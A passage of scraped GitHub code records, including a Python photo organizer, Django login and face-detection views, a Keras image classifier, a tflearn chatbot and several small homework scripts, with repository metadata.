int(nn1[c1])\r\n if max_n2 > max_n1:\r\n max_n1 = max_n2 \r\nprint('Максимальная цифра', max_n1) \r\n\r\n##################################################\r\n#Запросите у пользователя значения выручки и издержек фирмы. \r\n#Определите, с каким финансовым результатом работает фирма. \r\n#Например, прибыль — выручка больше издержек, или убыток — издержки \r\n#больше выручки. Выведите соответствующее сообщение.\r\n \r\nrevenue = int(input('Введите размер Вашей выручки... '))\r\ncost = int(input('Введите размер Ваших издержек... '))\r\n\r\nif revenue > cost:\r\n a = revenue - cost\r\n print('Ура! вы заработали. Ваш доход составляет', a, 'руб.')\r\nelse:\r\n a = cost - revenue\r\n print('Ваши финансы поют романсы. Вы ушли в минус на', a, 'руб.')\r\n\r\n#####################################################\r\n# Если фирма отработала с прибылью, вычислите рентабельность выручки. \r\n# Это отношение прибыли к выручке. \r\n# Далее запросите численность сотрудников фирмы и определите прибыль \r\n# фирмы в расчёте на одного сотрудника.\r\n\r\n\r\nprofit = revenue - cost\r\nprofitability = profit / revenue\r\nprint('Рентабельность составляет', profitability)\r\nstaff = int(input('Введите количество сотрудников... '))\r\nstaff_m = profit / staff\r\nprint('Прибыль на одного сотрудника составляет', staff_m)\r\n\r\n######################################################\r\ndistance_a = float(input('Введите расстояние, которое Вы пробежали в первый день... '))\r\ndistance_b = float(input('Введите расстояние, которое Вы хотели бы преодолеть... '))\r\ndistance_day_1 = distance_a * 1.1\r\nday = 2\r\nwhile distance_b > distance_day_1:\r\n distance_b /= 1.1\r\n day = day + 1\r\nprint('Вы достигните желаемого результата на ', day,'-й день')","repo_name":"kogb/GB_1_Python_Basics","sub_path":"220418 homework 1.py","file_name":"220418 homework 1.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17866463007","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nfrom __future__ import print_function, absolute_import\n\nimport os\nimport shutil\n\nfrom PIL import Image\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.exc import NoResultFound\nimport reusables\n\nfrom pyfoto.database import File, Tag, Base\nfrom pyfoto.config import get_config, save_config, get_stream_logger\n\nlogger = get_stream_logger(\"organizer\")\n\n\nclass Organize:\n\n def __init__(self, config_file: str=\"config.yaml\", engine=None):\n\n self.config = get_config(config_file)\n\n if not engine:\n engine = create_engine(self.config.connect_string)\n Base.metadata.create_all(engine, checkfirst=True)\n self.session = sessionmaker(bind=engine)()\n\n self.ensure_exists(self.config.storage_directory)\n self.save_config()\n\n @staticmethod\n def ensure_exists(directory: str) -> None:\n \"\"\"\n If a specified path does not exist, create it.\n\n :param directory: Path to make sure exists.\n :return:\n \"\"\"\n\n if directory and not os.path.exists(directory):\n os.makedirs(directory)\n\n @staticmethod\n def file_extension(file: str) -> str:\n \"\"\"\n Returns the extension of the file.\n\n :param file: Path to file as string.\n :return:\n \"\"\"\n\n ext = file.rsplit(\".\", 1)[1].lower()\n if ext == \"jpeg\":\n ext = \"jpg\"\n if ext == \"tiff\":\n ext = \"tif\"\n return ext\n\n def file_info(self, file: str) -> tuple:\n \"\"\"\n Returns file information.\n\n :param file: Path to file as string.\n :return:\n \"\"\"\n\n sha256 = reusables.file_hash(file, \"sha256\")\n ext = self.file_extension(file)\n size = os.path.getsize(file)\n\n return sha256, ext, size\n\n def already_ingested(self, sha256: str) -> bool:\n \"\"\"\n Determine if an item has already been ingested by\n comparing it to existing SHA256s.\n\n :param sha256:\n :return:\n \"\"\"\n\n if self.session.query(File).filter(File.sha256 == sha256).all():\n return True\n return False\n\n def _tag_strings_to_tags(self, tags: tuple) -> list:\n \"\"\"\n Take a list of strings that represent tags\n and return SQLAlchemy objects.\n\n :param tags: list of string tags.\n :return: list of SQLAlchemy objects.\n \"\"\"\n\n tags = list(tags)\n\n add_tags = []\n for tag in tags:\n try:\n add_tag = self.session.query(Tag).filter(Tag.tag == tag).one()\n except NoResultFound:\n add_tag = Tag(tag=tag)\n self.session.add(add_tag)\n if add_tag in add_tags:\n continue\n add_tags.append(add_tag)\n\n return add_tags\n\n def _ingest(self, file: str, ingest_path: str, sha256: str,\n tags: tuple=()) -> None:\n \"\"\"\n Copy a file to the new location and verify it was\n copied completely with the hash. Also create a thumbnail of the item.\n\n :param file:\n :param ingest_path:\n :param sha256:\n :param tags:\n :return:\n \"\"\"\n\n full_path = os.path.join(self.config.storage_directory, ingest_path)\n\n self.ensure_exists(os.path.dirname(full_path))\n\n if os.path.exists(full_path):\n raise Exception(\"File already exists and should not, halting. \"\n \"{0}\".format(full_path))\n\n shutil.copy(file, full_path)\n new_sha256, ext, size = self.file_info(full_path)\n\n if new_sha256 != sha256:\n logger.error(\"File {0} did not copy correctly!\".format(file))\n os.unlink(full_path)\n return\n\n thumb_path = os.path.join(\"thumbs\", ingest_path.rsplit(\".\")[0] + \".jpg\")\n thumb_dir = os.path.join(self.config.storage_directory, thumb_path)\n\n try:\n width, height = self.create_thumbnail(full_path, thumb_dir)\n except Exception as err:\n logger.exception(\"Count not create thumbnail for {0}, will \"\n \"redirect to main image. \"\n \"Error: {1}\".format(file, err))\n thumb_path = ingest_path\n width, height = 0, 0\n\n new_file = File(path=ingest_path, sha256=sha256, extension=ext,\n size=size, filename=os.path.basename(file),\n thumbnail=thumb_path, width=width, height=height,\n tags=self._tag_strings_to_tags(tags))\n\n self.session.add(new_file)\n if self.config.remove_source:\n os.unlink(file)\n\n def save_config(self) -> None:\n \"\"\"\n Convert the config to dict and write it out to the YAML file.\n\n :return:\n \"\"\"\n\n save_config(self.config.to_dict())\n\n def add_images(self, directory: str, tags: tuple=()):\n \"\"\"\n Go through a directory for all image files and ingest them.\n\n :param breaker:\n :param directory:\n :param tags:\n :return:\n \"\"\"\n\n total = 0\n # I don't use enumerate because I have to return the number at the end\n for file in reusables.find_all_files_generator(\n directory, ext=reusables.exts.pictures):\n total += 1\n if total % 20 == 0.0:\n logger.info(\"Ingested {0} images so far.\".format(total))\n\n sha256, ext, size = self.file_info(file)\n if (not self.config.ignore_duplicates and\n self.already_ingested(sha256)):\n logger.warning(\"file {0} already ingested\".format(file))\n continue\n\n self.config.file_inc += 1\n if self.config.file_inc > self.config.folder_limit:\n self.config.file_inc = 0\n self.config.dir_inc += 1\n self.session.commit()\n self.save_config()\n\n ingest_folder = self.config.dir_names.format(\n increment=self.config.dir_inc)\n\n ingest_path = os.path.join(ingest_folder,\n self.config.file_names.format(\n increment=self.config.file_inc,\n ext=ext,\n hash=sha256,\n size=size))\n\n try:\n self._ingest(file, ingest_path, sha256, tags=tags)\n except Exception as err:\n self.save_config()\n self.session.commit()\n raise err\n\n self.session.commit()\n self.save_config()\n return total\n\n def create_thumbnail(self, file: str, out_path: str,\n width: int=250, height: int=250) -> tuple:\n \"\"\"\n Create a thumbnail with Pillow then save it to the out_path. It will\n return the original image's width and height.\n\n :param file:\n :param out_path:\n :param width:\n :param height:\n :return:\n \"\"\"\n\n self.ensure_exists(os.path.dirname(out_path))\n im = Image.open(file)\n org_width, org_height = im.size\n im.thumbnail((width, height))\n try:\n im.save(out_path, \"JPEG\")\n except OSError:\n im.convert('RGB').save(out_path, \"JPEG\")\n return org_width, org_height\n\n def pull_deleted(self, move_dir=None):\n if not move_dir:\n move_dir = os.path.join(self.config.storage_directory, os.path.pardir, \"pyfoto_deleted\")\n self.ensure_exists(move_dir)\n all_deleted = self.session.query(File).filter(File.deleted == 1).filter(File.path != None).all()\n logger.info(\"{} deleted files about to be processed\".format(len(all_deleted)))\n for item in all_deleted:\n if item.path and os.path.exists(os.path.join(self.config.storage_directory, item.path)):\n shutil.move(os.path.join(self.config.storage_directory, item.path), os.path.join(move_dir, \"{}.{}\".format(item.sha256, item.extension)))\n item.path = None\n item.tags = []\n self.session.commit()\n\n def pull_tag(self, tag=\"edit\", move_dir=None, delete=True):\n if not move_dir:\n move_dir = os.path.join(self.config.storage_directory, os.path.pardir, \"pyfoto_{}\".format(tag))\n self.ensure_exists(move_dir)\n all_edits = self.session.query(File).filter(File.tags.any(Tag.tag == tag)).all()\n logger.info(\"{} edited files about to be processed\".format(len(all_edits)))\n for item in all_edits:\n if item.path and os.path.exists(os.path.join(self.config.storage_directory, item.path)):\n shutil.move(os.path.join(self.config.storage_directory, item.path), os.path.join(move_dir, \"{}.{}\".format(item.sha256, item.extension)))\n if delete:\n item.deleted = 1\n item.tags = []\n item.path = None\n self.session.commit()\n","repo_name":"cdgriffith/PyFoto","sub_path":"pyfoto/organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72987580104","text":"N = int(input())\nB = [int(input()) for _ in range(N-1)]\n\nfigure = [[] for _ in range(N)]\n\nfor i in range(N-1):\n figure[B[i]-1].append(i+1)\n\nsalary = [0]*N\n\nfor i in range(N-1, -1, -1):\n if len(figure[i]) == 0:\n salary[i] = 1\n elif len(figure[i]) == 1:\n n = figure[i][0]\n salary[i] = salary[n]*2 + 1\n else:\n minSalary = float('INF')\n maxSalary = -float('INF')\n for j in figure[i]:\n if minSalary > salary[j]:\n minSalary = salary[j]\n if maxSalary < salary[j]:\n maxSalary = salary[j]\n salary[i] = maxSalary + minSalary + 1\n\nprint(salary[0])","repo_name":"hiraiwa0928/PracticalAlgorithmSkillTest","sub_path":"MyProgram/abc026_c.py","file_name":"abc026_c.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74857246983","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .serializers import fashion_serializer\nfrom django.http import JsonResponse\nimport json\nfrom .utils import apt_query\nfrom .models import fashion\nimport random\n\n@csrf_exempt\ndef api_view(request):\n if request.method == \"GET\":\n keys=request.GET\n message=\"\"\n data={}\n serializer={}\n if len(keys)==0:\n data[\"random\"]=1\n queryset,message=apt_query(data)\n serializer=fashion_serializer(queryset)\n else:\n for i in keys:\n if i==\"place\" or i==\"accessories\":\n data[i]=request.GET.get(i).split(\",\")\n else:\n data[i]=request.GET.get(i)\n queryset,message=apt_query(data)\n serializer=fashion_serializer(queryset,many=True)\n return JsonResponse({\"message\":message,\"data\":serializer.data},safe=False)\n elif request.method == \"POST\":\n print(json.loads(request.body))\n return JsonResponse({\"message\":\"POST request\"})\n\n","repo_name":"governedbyprudence/FashionAPI","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23730106174","text":"import hashlib\nimport datetime\n\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\n\nfrom django.conf import settings\nfrom login import models\nfrom login import forms\nfrom login import face\nimport json\n# Create your views here.\n\n\ndef hash_code(s, salt='mysite'):# 加点盐\n h = hashlib.sha256()\n s += salt\n h.update(s.encode()) # update方法只接收bytes类型\n return h.hexdigest()\n\ndef index(request):\n request.session['index_active'] = 'active'\n request.session['detect_active'] = 'inactive'\n return render(request,'login/index.html')\n\n\ndef login(request):\n if request.session.get('is_login',None):\n return redirect('/index/')\n\n if request.method == 'POST':\n\n login_form = forms.UserForm(request.POST)\n message = \"\"\n\n if login_form.is_valid():\n username = login_form.cleaned_data['username']\n password = login_form.cleaned_data['password']\n\n try:\n user = models.User.objects.get(name=username)\n if not user.has_confirmed:\n message = '该用户还未通过邮件确认!'\n return render(request,'login/login.html',locals())\n if user.password == hash_code(password):\n request.session['is_login'] = True\n request.session['user_id'] = user.id\n request.session['user_name'] = user.name\n return redirect('/index/')\n else:\n message = \"密码不正确!\"\n except:\n message = \"用户名不存在!\"\n\n return render(request, 'login/login.html', locals())\n\n login_form = forms.UserForm()\n return render(request,'login/login.html',locals())\n\n\ndef make_confirm_string(user):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n code = hash_code(user.name,now)\n models.ConfirmString.objects.create(code=code,user=user)\n return code\n\ndef send_email(email,code):\n from django.core.mail import EmailMultiAlternatives\n\n subject = '注册确认邮件'\n\n text_content = '''感谢注册www.liujiangblog.com,这里是刘江的博客和教程站点,专注于Python和Django技术的分享!\\\n 如果你看到这条消息,说明你的邮箱服务器不提供HTML链接功能,请联系管理员!'''\n\n html_content = '''\n

感谢注册www.liujiangblog.com,\\\n 这里是刘江的博客和教程站点,专注于Python和Django技术的分享!

\n

请点击站点链接完成注册确认!

\n

此链接有效期为{}天!

\n '''.format('127.0.0.1:8000', code, settings.CONFIRM_DAYS)\n msg = EmailMultiAlternatives(subject, text_content, settings.EMAIL_HOST_USER, [email])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\ndef register(request):\n if request.session.get('is_login',None):\n return redirect('/index/')\n\n if request.method == 'POST':\n register_form = forms.RegisterForm(request.POST)\n message = \"\"\n\n if register_form.is_valid():\n username = register_form.cleaned_data['username']\n password1 = register_form.cleaned_data['password1']\n password2 = register_form.cleaned_data['password2']\n email = register_form.cleaned_data['email']\n sex = register_form.cleaned_data['sex']\n\n if password1 != password2:\n message = \"两次输入的密码不同!\"\n return render(request,'login/register.html',locals())\n else:\n same_name_user = models.User.objects.filter(name=username)\n if same_name_user:\n message = \"用户已存在,请重新选择用户名!\"\n return render(request,'login/register.html',locals())\n same_email_user = models.User.objects.filter(email=email)\n if same_email_user:\n message = \"该邮箱地址已被注册,请使用其他邮箱!\"\n return render(request,'login/register.html',locals())\n\n new_user = models.User()\n new_user.name = username\n new_user.password = hash_code(password1)\n new_user.email = email\n new_user.sex = sex\n new_user.save()\n\n code = make_confirm_string(new_user)\n return redirect('/login/')\n register_form = forms.RegisterForm()\n return render(request,'login/register.html',locals())\n\ndef logout(request):\n if not request.session.get('is_login',None):\n return redirect('/index/')\n request.session.flush()\n return redirect(\"/index/\")\n\ndef user_confirm(request):\n code = request.GET.get('code',None)\n message = ''\n try:\n confirm = models.ConfirmString.objects.get(code=code)\n except:\n message = '无效的确认请求!'\n return render(request,'login/confirm.html',locals())\n\n c_time = confirm.c_time\n now = datetime.datetime.now()\n if now > c_time + datetime.timedelta(settings.CONFIRM_DAYS):\n confirm.user.delete()\n message = '您的邮件已经过期!请重新注册!'\n return render(request,'login/confirm.html',locals())\n else:\n confirm.user.has_confirmed = True\n confirm.user.save()\n confirm.delete()\n message = '感谢确认,请使用账户登录!'\n return render(request,'login/confirm.html',locals())\n\n\ndef detect(request):\n request.session['index_active'] = 'inactive'\n request.session['detect_active'] = 'active'\n if request.session.get('is_login', None):\n if request.method == 'GET':\n return render(request, 'login/detect.html', locals())\n\n if request.method == 'POST':\n file = request.FILES.get('file',None)\n file_path = settings.IMAGE_ROOT + file.name\n with open(file_path,'wb') as f:\n for i in file.chunks():\n f.write(i)\n file_src = file.name\n result = json.loads(face.FaceDetect(file_path))['faces'][0]['attributes']\n keys = ['emotion', 'gender', 'age', 'mouthstatus', 'glass', 'skinstatus', 'smile', 'eyestatus', 'ethnicity']\n image_result = {\n 'emotion':'',\n 'gender': '',\n 'age': '',\n 'glass': '',\n 'smile': '',\n 'ethnicity':''\n }\n if not result is None:\n for key in keys:\n if key == 'age' and result[key]['value']:\n image_result[key] = result[key]['value']\n\n if key == 'gender' and result[key]['value']:\n if result[key]['value'] == 'Male':\n image_result[key] = '男'\n elif result[key]['value'] == 'Female':\n image_result[key] = '女'\n else:\n image_result[key] = '未知'\n\n if key == 'glass' and result[key]['value']:\n if result[key]['value'] == 'Dark':\n image_result[key] = '戴墨镜'\n elif result[key]['value'] == 'Normal':\n image_result[key] = '戴眼镜'\n\n if key == 'ethnicity' and result[key]['value']:\n if result[key]['value'] == 'ASIAN':\n image_result[key] = '亚洲人'\n elif result[key]['value'] == 'WHITE':\n image_result[key] = '白人'\n elif result[key]['value'] == 'BLACK':\n image_result[key] = '黑人'\n\n if key == 'smile' and result[key]['value']:\n if result[key]['value'] > result[key]['threshold']:\n image_result[key] = '微笑'\n\n if key == 'emotion':\n emotion = max(result[key],key=result[key].get)\n if emotion == 'surprise':\n image_result[key] = '惊讶'\n elif emotion == 'amger':\n image_result[key] = '愤怒'\n elif emotion == 'disgust':\n image_result[key] = '厌恶'\n elif emotion == 'fear':\n image_result[key] = '恐惧'\n elif emotion == 'happiness':\n image_result[key] = '高兴'\n elif emotion == 'neutral':\n image_result[key] = '平静'\n elif emotion == 'sadness':\n image_result[key] = '伤心'\n return render(request, 'login/detect.html', locals())\n else:\n return redirect('/login/')\n","repo_name":"Handsun/Face","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6733879096","text":"\"\"\"\nutf-8\nСоздан 26.10.2021\n\n:author: maria.kalashnikova\n\nОбучающий курс Python QA Engineer.\nДомашняя работа №2. Класс треугольников.\n\"\"\"\nfrom oop_pattern.src.figure import Figure\n\n\nclass Triangle(Figure):\n \"\"\"\n Класс для создания треугольников\n\n Могут быть созданы треугольники:\n - равносторонний - необходимо передать 1 аргумент (длинну стороны)\n - равнобедренный - необходимо передать 2 аргумента (длинну основания и длину стороны)\n - обыкновенный - необходимо передать 3 аргумента (длинну каждой стороны)\n \"\"\"\n name = \"Triangle\"\n\n def __new__(cls, *args, **kwargs):\n for arg in args:\n if isinstance(arg, (int, float)) is False:\n raise ValueError(f\"Side value can be an int or float, not {type(arg)}\")\n if arg <= 0:\n raise ValueError(f\"The side length must be a positive value, not {arg}\")\n if len(args) == 3:\n if (args[0] + args[1] > args[2] and args[0] + args[2] > args[1] and args[1] + args[2] > args[0]) is False:\n return None\n else:\n new_obj = object.__new__(cls)\n return new_obj\n else:\n new_obj = object.__new__(cls)\n return new_obj\n\n def __init__(self, *args):\n if len(args) == 1:\n self.side_values = [args[0], args[0], args[0]]\n elif len(args) == 2:\n self.side_values = [args[0], args[1], args[1]]\n elif len(args) == 3:\n self.side_values = []\n for arg in args:\n self.side_values.append(arg)\n else:\n raise ValueError(\"it's not a triangle. Maximum 3 values can be passed\")\n\n @property\n def area(self):\n semi_perimeter = self.perimeter/2\n base_of_degree = 1\n for side in self.side_values:\n factor = (semi_perimeter - side)\n base_of_degree *= factor\n area = (base_of_degree * semi_perimeter) ** 0.5\n return round(area, 2)\n\na = Triangle(13, 14, 15)\nprint(a.perimeter)","repo_name":"maria-kalashnikova/autotests","sub_path":"oop_pattern/src/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40050917130","text":"\"\"\"\nURL configuration for SEL4C project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import handler404\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom drf_spectacular.views import SpectacularAPIView\nfrom rest_framework import routers\nfrom app1 import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'usuarios', views.UserViewSet)\nrouter.register(r'sesiones', views.SessionViewSet)\nrouter.register(r'preguntas', views.QuestionViewSet)\nrouter.register(r'respuestas', views.SurveyViewSet)\nrouter.register(r'respuestas_detalladas', views.AnswerQuestionViewSet)\nrouter.register(r'entregas', views.DeliverViewSet)\n\n# Our customized 404 error page\nhandler404 = views.pag_404_not_found\n\n# Wire op our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API. \nurlpatterns = [\n path('', views.index, name = 'index'),\n path('contacto/', views.contacto, name = 'contacto'),\n path('registro/', views.register, name = 'registro'),\n path('graficas/', views.graficas, name = 'graficas'),\n path('usuarios/', views.panel_users, name = 'usuarios'),\n path('estadisticas/', views.statistics, name = 'estadisticas'),\n path('login/', views.LoginView.as_view(template_name = 'iniciosesion.html'), name = 'login'),\n path('auth/', views.auth, name = 'auth'),\n path('admin/', admin.site.urls),\n path('api/', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace = 'rest_framework')),\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n path('api/user_data/', views.user_data, name='user_data'),\n path('api/create_user/', views.create_user, name='create_user'),\n path('api/delete_user//', views.delete_user, name='delete_user'),\n path('api/graph-social/', views.global_profile_entrepreneur, name = 'graph social'),\n path('api/graph-thinking/', views.global_profile_thinking, name = 'graph thinking'),\n path('api/unique-graph-social//', views.unique_profile_entrepreneur, name='profile_entrepreneur'),\n path('api/unique-graph-thinking//', views.unique_profile_thinking, name='profile_thinking'),\n path('user_responses/', views.user_responses, name='user_responses'),\n path('UploadFile', views.UploadFile, name='UploadFile'),\n path('simple_upload', views.simple_upload, name='simple_upload'),\n path('logout/', views.logout_user, name = 'logout')\n]\n","repo_name":"AntonioLaurance/SEL4C_BE","sub_path":"SEL4C/SEL4C/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1251895895","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 2 17:28:43 2018\r\n\r\n@author: filipe.luz\r\n\"\"\"\r\n\r\n#Convolutional Neural Network\r\n\r\n#Installing Theano,Tensorflow,Keras\r\n\r\n#Part 1 - Bulding the convolutional neural network\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\n# Initialising the cnn\r\nclassifier = Sequential()\r\n\r\n# Step 1 - Convolution\r\nclassifier.add(Convolution2D(32, 3, 3, \r\n input_shape = (64, 64, 3 ),\r\n activation = 'relu'))\r\n\r\n# Step 2 - Pooling\r\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\r\n\r\n\r\nclassifier.add(Convolution2D(32, 3, 3, \r\n activation = 'relu'))\r\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\r\n\r\n\r\n# Step 3 - Flattening\r\nclassifier.add(Flatten())\r\n\r\n# Step 4 - Full Conected Layers\r\n#input\r\nclassifier.add(Dense(output_dim = 128, activation = 'relu'))\r\n#output\r\nclassifier.add(Dense(output_dim = 1, activation = 'sigmoid'))\r\n\r\n# Compiling the CNN\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\n\r\n#Part 2 - Fitting the CNN to the images\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True)\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntraining_set = train_datagen.flow_from_directory(\r\n 'dataset/training_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\ntest_set = test_datagen.flow_from_directory(\r\n 'dataset/test_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\nclassifier.fit_generator(\r\n training_set,\r\n steps_per_epoch=8000,\r\n epochs=3,\r\n validation_data=test_set,\r\n nb_val_samples=2000)\r\n\r\n\r\n\r\n#Testing new picture to classify\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\ntest_image = image.load_img('C:/Users/filipe.luz/Desktop/Machine Learning A-Z Template Folder/Part 8 - Deep Learning/Section 40 - Convolutional Neural Networks (CNN)/Convolutional_Neural_Networks/dataset/hd_foto.jpg', target_size = (64, 64))\r\ntest_image = image.img_to_array(test_image)\r\ntest_image = np.expand_dims(test_image, axis = 0)\r\nresult = classifier.predict(test_image)\r\n#training_set.class_indices\r\nif result[0][0] == 1:\r\n prediction = 'dog'\r\n print('dog')\r\nelse:\r\n prediction = 'cat'\r\n print('cat')\r\n","repo_name":"FIlipeRBLuz/Data-Science","sub_path":"Convolutional_neural_network_byMe.py","file_name":"Convolutional_neural_network_byMe.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"34886633617","text":"# Task 7: Write a Python program that accepts a string and calculates the number of digits and letters.\n# Sample Data : Python 3.2\n# Expected Output :\n# Letters 6\n# Digits 2\ndef count_letters_and_digits(text):\n letters = 0\n digits = 0\n rest_of_the_stuff = 0\n for char in text:\n if char.isdigit():\n digits += 1\n elif char.isalpha():\n letters += 1\n else:\n rest_of_the_stuff += 1\n print(\n f\"Letters: {letters}\\n\"\n f\"Digits: {digits}\\n\"\n f\"Rest of the stuff(spaces, dots, commas, etc.: {rest_of_the_stuff}\"\n )\n\n\ncount_letters_and_digits(\"Python 3.2\")\n","repo_name":"T6nisValk/School","sub_path":"Basics/Class_4-5_13.05-14.05.23/Tasks 13.05.23/task_7.py","file_name":"task_7.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10669480985","text":"import nltk\r\nimport os\r\nfrom nltk.stem.lancaster import LancasterStemmer \r\nimport numpy\r\nimport tflearn\r\nimport tensorflow as tf\r\nimport random\r\nimport json\r\nimport pickle\r\nstemmer = LancasterStemmer()\r\n\r\n\r\n#start of data preprocessing\r\nclass preProcessing():\r\n def __init__(self):\r\n self.data = json.load(open(\"intents.json\")) #Open intents.json file\r\n try:\r\n with open(\"data.pickle\",\"rb\") as f:\r\n self.words, self.labels, self.training, self.output = pickle.load(f) #try to import data if there is a file available\r\n except:\r\n self.words = []\r\n self.labels = []\r\n docs_x = []\r\n docs_y = []\r\n \r\n for intent in self.data[\"intents\"]: #loop through intents\r\n for pattern in intent[\"patterns\"]: #loop through patterns\r\n wrds = nltk.word_tokenize(pattern) #break text into individiual words\r\n self.words.extend(wrds) #wrds list is added to words\r\n docs_x.append(wrds)\r\n docs_y.append(intent[\"tag\"])\r\n \r\n if intent[\"tag\"] not in self.labels:#add label if label in json file is not in label list\r\n self.labels.append(intent[\"tag\"])\r\n\r\n self.words = [stemmer.stem(w.lower()) for w in self.words if w != \"?\"] #get root word, does not get question mark\r\n self.words = sorted(list(set(self.words))) #set makes sure that there are no duplicate words\r\n #list makes words back into list\r\n #sorted sorts the list\r\n self.labels = sorted(self.labels)\r\n self.training = []\r\n self.output = []\r\n out_empty = [0 for _ in range(len(self.labels))]\r\n\r\n for x, doc in enumerate(docs_x):\r\n bag = []\r\n wrds = [stemmer.stem(w) for w in doc]\r\n \r\n for w in self.words:\r\n if w in wrds:\r\n bag.append(1)\r\n else:\r\n bag.append(0)\r\n\r\n output_row = out_empty[:] #create a copy of out_empty\r\n output_row[self.labels.index(docs_y[x])] = 1 #look through labels, set value to 1 if located in labels\r\n\r\n self.training.append(bag) #append bag to training list\r\n self.output.append(output_row)\r\n\r\n self.training = numpy.array(self.training) #turn into numpy array\r\n self.output = numpy.array(self.output) #turn into numpy array\r\n with open(\"data.pickle\",\"wb\") as f:\r\n pickle.dump((self.words, self.labels, self.training, self.output),f) #write all data into a pickle file\r\n \r\n def getTraining(self):\r\n return self.training\r\n def getWords(self):\r\n return self.words\r\n def getLabels(self):\r\n return self.labels\r\n def getOutput(self):\r\n return self.output\r\n def getData(self):\r\n return self.data\r\n#end of data preprocessing\r\n\r\nclass createModel():\r\n def __init__(self,training, output):\r\n tf.reset_default_graph()\r\n net = tflearn.input_data(shape=[None, len(training[0])]) #Find input shape for model\r\n net = tflearn.fully_connected(net, 8) #8 neurons for hidden layer\r\n net = tflearn.fully_connected(net, 8) #another 8 neurons for hidden layer\r\n net = tflearn.fully_connected(net, len(output[0]), activation = \"softmax\") #output layer, get probabilities for each output\r\n net = tflearn.regression(net)\r\n\r\n self.model = tflearn.DNN(net) #create model for training\r\n\r\n try:\r\n self.model.load(\"model.tflearn\") #load model if there is a file available (so that there is no need for retraining)\r\n except:\r\n self.model = tflearn.DNN(net)\r\n self.model.fit(training,output,n_epoch=2000,batch_size=8,show_metric=True) #2000 iterations for learning\r\n self.model.save(\"model.tflearn\") #save model for later use\r\n \r\n def getModel(self):\r\n return self.model\r\n \r\ndef bag_of_words(s,words):\r\n bag=[0 for _ in range(len(words))] #blank bag of words list\r\n s_words = nltk.word_tokenize(s) #list of tokenized words\r\n s_words = [stemmer.stem(word.lower()) for word in s_words] #stem words from s_words list\r\n \r\n for se in s_words:\r\n for i,w in enumerate(words):\r\n if w==se:\r\n bag[i]=1 #change value of element in bag to 1 if word in words is equal to word in s_words\r\n \r\n return numpy.array(bag) #return a numpy array from bag\r\n\r\nclass botChat():\r\n def __init__(self):\r\n self.process = preProcessing()\r\n self.model = createModel(self.process.getTraining(),self.process.getOutput())\r\n \r\n def chat(self,inp):\r\n results = self.model.getModel().predict([bag_of_words(inp, self.process.getWords())])[0] #generates probability from input for each of the tags\r\n results_index = numpy.argmax(results) #finds the index of greatest value in the list\r\n tag = self.process.getLabels()[results_index] #returns tag from the index given before\r\n \r\n if results[results_index] >0.9:\r\n for tg in self.process.getData()[\"intents\"]:\r\n if tg['tag'] == tag:\r\n responses = tg['responses'] #get responses from tag\r\n return(random.choice(responses)) #display a random response from list\r\n else:\r\n return(\"I did not understand. Please try to ask another question.\") #asks the user to ask another question if probability is less than 80% 